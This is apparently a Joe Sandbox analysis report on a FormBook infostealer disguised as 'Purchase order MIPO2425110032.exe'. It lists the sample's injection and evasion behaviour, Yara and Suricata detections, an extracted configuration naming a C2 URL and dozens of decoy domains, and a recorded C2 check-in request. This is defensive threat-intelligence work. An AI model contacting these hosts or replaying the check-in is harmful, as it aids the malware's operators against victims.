Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase order MIPO2425110032.exe

Overview

General Information

Sample name:Purchase order MIPO2425110032.exe
Analysis ID:1548508
MD5:85c1c3e112a22e4f23eaf97d86fef355
SHA1:4922c4f1c57d740ad9f7d46bba1b18f8744277db
SHA256:88e7becf09f33e1db8fe108dbe9687a13bf1225ecf322a00f2e67b86a8931813
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Reads the DNS cache
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase order MIPO2425110032.exe (PID: 2520 cmdline: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe" MD5: 85C1C3E112A22E4F23EAF97D86FEF355)
    • svchost.exe (PID: 1396 cmdline: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autochk.exe (PID: 6604 cmdline: "C:\Windows\SysWOW64\autochk.exe" MD5: FC398299F54290D5F35C69E865FD7CC2)
      • ipconfig.exe (PID: 6000 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
        • cmd.exe (PID: 3440 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.9net88.net/ge07/"], "decoy": ["amyard.shop", "eloshost.xyz", "g18q11a.top", "orensic-vendor-735524320.click", "ithin-ksvodn.xyz", "xhyx.top", "elonix-traceglow.pro", "cillascrewedsedroth.cfd", "wner-nyquh.xyz", "reyhazeusa.shop", "esmellretaperetotal.cfd", "hqm-during.xyz", "pipagtxcorrelo.xyz", "lray-civil.xyz", "apybarameme.xyz", "rbuds.shop", "hild-fcudh.xyz", "rkgexg.top", "estwestcottwines.shop", "giyztm.xyz", "epehr.pics", "lways-vhyrp.xyz", "acifictechnologycctv.net", "iscinddocenaemlynne.cfd", "ridesmaidgiftsboutiqueki.shop", "ubtleclothingco.fashion", "hemicans.xyz", "ebaoge318.top", "zoc-marriage.xyz", "ngeribe2.homes", "oal-ahzgwo.xyz", "eries-htii.xyz", "ool-covers76.xyz", "ecurityemployment.today", "croom.net", "f7y2i9fgm.xyz", "earch-lawyer-consultation.today", "066iwx2t.shop", "ound-omagf.xyz", "ivglass.xyz", "fdyh-investment.xyz", "yegle.net", "eader-aaexvn.xyz", "dvle-father.xyz", "onsfskfsmpfssfpewqdsawqe.xyz", "ffect-xedzl.xyz", "ood-packaging-jobs-brasil.today", "lasterdeals.shop", "ehkd.top", "pm-22-ns-2.click", "ocockbowerlybrawer.cfd", "ostcanadantpl.top", "vrkof-point.xyz", "lsader.app", "nce-ystyx.xyz", "azl.pro", "ea-yogkkb.xyz", "isit-txax.xyz", "rowadservepros.net", "6282.xyz", "roduct-xgky.xyz", "wner-nyquh.xyz", "sfmoreservicesllc.lat", "rasko.net"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 33 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18809:$sqlite3step: 68 34 1C 7B E1
          • 0x1891c:$sqlite3step: 68 34 1C 7B E1
          • 0x18838:$sqlite3text: 68 38 2A 90 C5
          • 0x1895d:$sqlite3text: 68 38 2A 90 C5
          • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", CommandLine: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", ParentImage: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, ParentProcessId: 2520, ParentProcessName: Purchase order MIPO2425110032.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", ProcessId: 1396, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", CommandLine: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", ParentImage: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, ParentProcessId: 2520, ParentProcessName: Purchase order MIPO2425110032.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", ProcessId: 1396, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-04T15:28:16.536065+010020229301A Network Trojan was detected52.149.20.212443192.168.2.549704TCP
          2024-11-04T15:28:55.195375+010020229301A Network Trojan was detected52.149.20.212443192.168.2.549895TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-04T15:29:02.927018+010020314531Malware Command and Control Activity Detected192.168.2.549943156.235.1.3080TCP
          2024-11-04T15:30:04.960785+010020314531Malware Command and Control Activity Detected192.168.2.549977199.59.243.22780TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: Purchase order MIPO2425110032.exeAvira: detected
          Found malware configuration
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.9net88.net/ge07/"], "decoy": ["amyard.shop", "eloshost.xyz", "g18q11a.top", "orensic-vendor-735524320.click", "ithin-ksvodn.xyz", "xhyx.top", "elonix-traceglow.pro", "cillascrewedsedroth.cfd", "wner-nyquh.xyz", "reyhazeusa.shop", "esmellretaperetotal.cfd", "hqm-during.xyz", "pipagtxcorrelo.xyz", "lray-civil.xyz", "apybarameme.xyz", "rbuds.shop", "hild-fcudh.xyz", "rkgexg.top", "estwestcottwines.shop", "giyztm.xyz", "epehr.pics", "lways-vhyrp.xyz", "acifictechnologycctv.net", "iscinddocenaemlynne.cfd", "ridesmaidgiftsboutiqueki.shop", "ubtleclothingco.fashion", "hemicans.xyz", "ebaoge318.top", "zoc-marriage.xyz", "ngeribe2.homes", "oal-ahzgwo.xyz", "eries-htii.xyz", "ool-covers76.xyz", "ecurityemployment.today", "croom.net", "f7y2i9fgm.xyz", "earch-lawyer-consultation.today", "066iwx2t.shop", "ound-omagf.xyz", "ivglass.xyz", "fdyh-investment.xyz", "yegle.net", "eader-aaexvn.xyz", "dvle-father.xyz", "onsfskfsmpfssfpewqdsawqe.xyz", "ffect-xedzl.xyz", "ood-packaging-jobs-brasil.today", "lasterdeals.shop", "ehkd.top", "pm-22-ns-2.click", "ocockbowerlybrawer.cfd", "ostcanadantpl.top", "vrkof-point.xyz", "lsader.app", "nce-ystyx.xyz", "azl.pro", "ea-yogkkb.xyz", "isit-txax.xyz", "rowadservepros.net", "6282.xyz", "roduct-xgky.xyz", "wner-nyquh.xyz", "sfmoreservicesllc.lat", "rasko.net"]}
          Multi AV Scanner detection for submitted file
          Source: Purchase order MIPO2425110032.exeReversingLabs: Detection: 21%
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: Purchase order MIPO2425110032.exeJoe Sandbox ML: detected
          Source: Purchase order MIPO2425110032.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: ipconfig.pdb source: svchost.exe, 00000002.00000003.2190510820.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190826330.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190955342.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000005.00000002.3285457081.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: svchost.exe, 00000002.00000003.2190510820.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190826330.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190955342.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3285457081.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase order MIPO2425110032.exe, 00000000.00000003.2045249751.0000000004540000.00000004.00001000.00020000.00000000.sdmp, Purchase order MIPO2425110032.exe, 00000000.00000003.2045727353.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2191013249.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046797348.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2049073833.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2191013249.000000000399E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3286755953.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3286755953.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2192710739.000000000370F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2191001100.0000000003534000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Purchase order MIPO2425110032.exe, 00000000.00000003.2045249751.0000000004540000.00000004.00001000.00020000.00000000.sdmp, Purchase order MIPO2425110032.exe, 00000000.00000003.2045727353.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2191013249.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046797348.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2049073833.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2191013249.000000000399E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000005.00000002.3286755953.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3286755953.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2192710739.000000000370F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2191001100.0000000003534000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3299252701.0000000010B0F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3287464793.0000000003E0F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3285883515.0000000003382000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3299252701.0000000010B0F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3287464793.0000000003E0F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3285883515.0000000003382000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49977 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49977 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49977 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49943 -> 156.235.1.30:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49943 -> 156.235.1.30:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49943 -> 156.235.1.30:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 156.235.1.30 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.9net88.net/ge07/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.6282.xyz
          Source: global trafficHTTP traffic detected: GET /ge07/?VN9H=FOymHjEy8INtRP80ztKDHy+SkTRNuxtAsSGbgkPqAuR0sH6nXW9AVXeVOt+ErvTzet/o&H0Gx7d=DzrdohnPa4vXCBq HTTP/1.1Host: www.6282.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49704
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49895
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
          Source: global trafficHTTP traffic detected: GET /ge07/?VN9H=FOymHjEy8INtRP80ztKDHy+SkTRNuxtAsSGbgkPqAuR0sH6nXW9AVXeVOt+ErvTzet/o&H0Gx7d=DzrdohnPa4vXCBq HTTP/1.1Host: www.6282.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.sfmoreservicesllc.lat
          Source: global trafficDNS traffic detected: DNS query: www.6282.xyz
          Source: global trafficDNS traffic detected: DNS query: www.ostcanadantpl.top
          Source: global trafficDNS traffic detected: DNS query: www.rkgexg.top
          Source: global trafficDNS traffic detected: DNS query: www.9net88.net
          Source: explorer.exe, 00000003.00000002.3291923932.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000000.2055532925.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3285665342.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: explorer.exe, 00000003.00000002.3291923932.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000002.3291923932.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000002.3291923932.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000002.3291923932.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000000.2059075313.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3290832822.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2059048265.0000000008870000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6282.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6282.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6282.xyz/ge07/www.ostcanadantpl.top
